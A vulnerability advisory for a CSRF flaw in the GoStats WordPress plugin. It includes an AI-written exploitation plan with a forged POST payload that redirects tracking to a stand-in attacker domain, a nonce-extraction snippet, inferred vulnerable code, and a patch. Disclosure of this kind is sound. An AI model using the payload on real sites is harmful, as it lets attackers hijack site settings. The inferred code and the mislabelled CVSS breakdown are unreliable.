CVE-2026-8943

GoStats for WordPress <= 1.4 - Cross-Site Request Forgery via gostats_manage() Function

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The GoStats for WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.4. This is due to missing or incorrect nonce validation on the gostats_manage() function. This makes it possible for unauthenticated attackers to update the plugin's settings (gostats_siteid and gostats_server options) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.4
PublishedMay 26, 2026
Last updatedMay 27, 2026
Affected plugingostats-for-wordpress
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-8943 (GoStats for WordPress CSRF) ## 1. Vulnerability Summary The **GoStats for WordPress** plugin (up to and including version 1.4) contains a Cross-Site Request Forgery (CSRF) vulnerability within its settings management logic. The function responsible for p…

Show full research plan

Exploitation Research Plan: CVE-2026-8943 (GoStats for WordPress CSRF)

1. Vulnerability Summary

The GoStats for WordPress plugin (up to and including version 1.4) contains a Cross-Site Request Forgery (CSRF) vulnerability within its settings management logic. The function responsible for processing configuration updates, gostats_manage(), fails to implement WordPress nonce validation (e.g., check_admin_referer()). Consequently, an attacker can modify critical plugin settings—specifically the gostats_siteid and gostats_server options—by tricking an authenticated administrator into interacting with a malicious link or form.

2. Attack Vector Analysis

  • Endpoint: WordPress Admin Dashboard, typically wp-admin/options-general.php?page=gostats-for-wordpress (inferred slug).
  • Vulnerable Action: POST request to the settings page.
  • Payload Parameters:
    • gostats_siteid: The ID for the GoStats account (usually an integer).
    • gostats_server: The server address used for stats tracking.
  • Authentication Level: Requires an active session of a user with manage_options capabilities (Administrator).
  • Preconditions: The plugin must be active.

3. Code Flow (Inferred)

  1. Registration: The plugin uses the admin_menu hook to register a settings page:
    add_action('admin_menu', 'gostats_add_menu');
    function gostats_add_menu() {
        add_options_page('GoStats', 'GoStats', 'manage_options', 'gostats-for-wordpress', 'gostats_manage');
    }
    
  2. Processing: When the gostats_manage() function is invoked (during page load or form submission), it checks for POST data:
    function gostats_manage() {
        if (isset($_POST['gostats_siteid'])) {
            // VULNERABILITY: Missing check_admin_referer('gostats-update-options');
            update_option('gostats_siteid', $_POST['gostats_siteid']);
            update_option('gostats_server', $_POST['gostats_server']);
            // ...
        }
        // ... renders the HTML form ...
    }
    
  3. Sink: The update_option() function persists the attacker-controlled values to the wp_options table.

4. Nonce Acquisition Strategy

According to the vulnerability description, nonce validation is missing or incorrect.

  • If Missing: No nonce is required in the POST request.
  • If Incorrect: The plugin might be using a static or easily guessable string, or it might be calling wp_verify_nonce without checking the return value.

Plan for the Execution Agent:

  1. First, attempt the exploit without a nonce.
  2. If the request fails due to a security error, search the plugin source for any wp_create_nonce calls.
  3. If a nonce is generated for the settings form, use the following JS to extract it via browser_eval after navigating to the settings page:
    browser_eval("document.querySelector('input[name=\"_wpnonce\"]')?.value")

5. Exploitation Strategy

The goal is to demonstrate that an unauthenticated attacker can change the site's GoStats configuration via an administrator's browser.

Step-by-Step Plan:

  1. Identify Endpoint: Confirm the admin page URL. It is likely http://vulnerable-wp.local/wp-admin/options-general.php?page=gostats-for-wordpress.
  2. Craft Payload: Prepare a POST request that sets gostats_siteid to a recognizable "attacker" value (e.g., 13377331) and gostats_server to a malicious domain (e.g., evil-stats.com).
  3. Execute CSRF: Use the http_request tool to send a POST request to the endpoint.
    Note: In the test environment, the tool will utilize the administrator's cookies to simulate the CSRF effect.

HTTP Request (Payload):

POST /wp-admin/options-general.php?page=gostats-for-wordpress HTTP/1.1
Host: [TARGET_HOST]
Content-Type: application/x-www-form-urlencoded

gostats_siteid=13377331&gostats_server=evil-stats.com&submit=Save+Changes

6. Test Data Setup

  1. Install Plugin: Ensure "GoStats for WordPress" <= 1.4 is installed and activated.
  2. Initialize Options: Set baseline values via WP-CLI to ensure the change is detectable:
    wp option update gostats_siteid "9999"
    wp option update gostats_server "server1.gostats.com"
    
  3. User Context: Ensure the execution agent has the session cookies for a user with the administrator role.

7. Expected Results

  • The server should return a 200 OK or 302 Found (redirect).
  • The response body should ideally contain a "Settings saved" success message (if the plugin provides one).
  • The database options gostats_siteid and gostats_server should be updated to the attacker's values.

8. Verification Steps

After the HTTP request, use WP-CLI to verify the state change:

# Check site ID
wp option get gostats_siteid
# Expected output: 13377331

# Check server
wp option get gostats_server
# Expected output: evil-stats.com

9. Alternative Approaches

If the plugin uses a different slug for the settings page:

  1. Run wp eval "echo menu_page_url('gostats-for-wordpress', false);" to find the exact URL.
  2. Search the plugin code for add_action( 'admin_init', ... ) to see if settings are processed there instead of the menu callback.
  3. If the parameters are different (e.g., prefixed), grep the source for update_option to find the exact $_POST keys:
    grep -r "update_option" wp-content/plugins/gostats-for-wordpress/
Research Findings
Static analysis — not yet PoC-verified

Summary

The GoStats for WordPress plugin (<= 1.4) is vulnerable to Cross-Site Request Forgery (CSRF) due to a lack of nonce validation in the gostats_manage() function. This allows unauthenticated attackers to modify tracking settings, such as the GoStats Site ID and Server, by tricking a logged-in administrator into submitting a malicious request.

Vulnerable Code

// Inferred file path: gostats-for-wordpress/gostats.php

function gostats_manage() {
    if (isset($_POST['gostats_siteid'])) {
        // VULNERABILITY: No check_admin_referer() or nonce validation here
        update_option('gostats_siteid', $_POST['gostats_siteid']);
        update_option('gostats_server', $_POST['gostats_server']);
        // ... (truncated)
    }
    // ... (truncated)
}

Security Fix

--- a/gostats.php
+++ b/gostats.php
@@ -1,5 +1,6 @@
 function gostats_manage() {
     if (isset($_POST['gostats_siteid'])) {
+        check_admin_referer('gostats-update-options');
         update_option('gostats_siteid', $_POST['gostats_siteid']);
         update_option('gostats_server', $_POST['gostats_server']);
         echo '<div class="updated"><p>Settings saved.</p></div>';
@@ -10,4 +11,5 @@
 <form method="post">
+    <?php wp_nonce_field('gostats-update-options'); ?>
     <input type="text" name="gostats_siteid" value="<?php echo get_option('gostats_siteid'); ?>">
     <input type="text" name="gostats_server" value="<?php echo get_option('gostats_server'); ?>">
     <input type="submit" value="Save Changes">

Exploit Outline

The exploit target is the plugin's settings page, typically located at `/wp-admin/options-general.php?page=gostats-for-wordpress`. An attacker crafts a malicious HTML page containing a hidden form that targets this URL using the POST method. The form includes parameters for 'gostats_siteid' and 'gostats_server' with attacker-controlled values. When an authenticated WordPress administrator visits the attacker's page, JavaScript is used to automatically submit the form. Since the plugin does not verify a cryptographic nonce, the server processes the request as legitimate, using the administrator's active session cookies to authorize the update of the global options.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.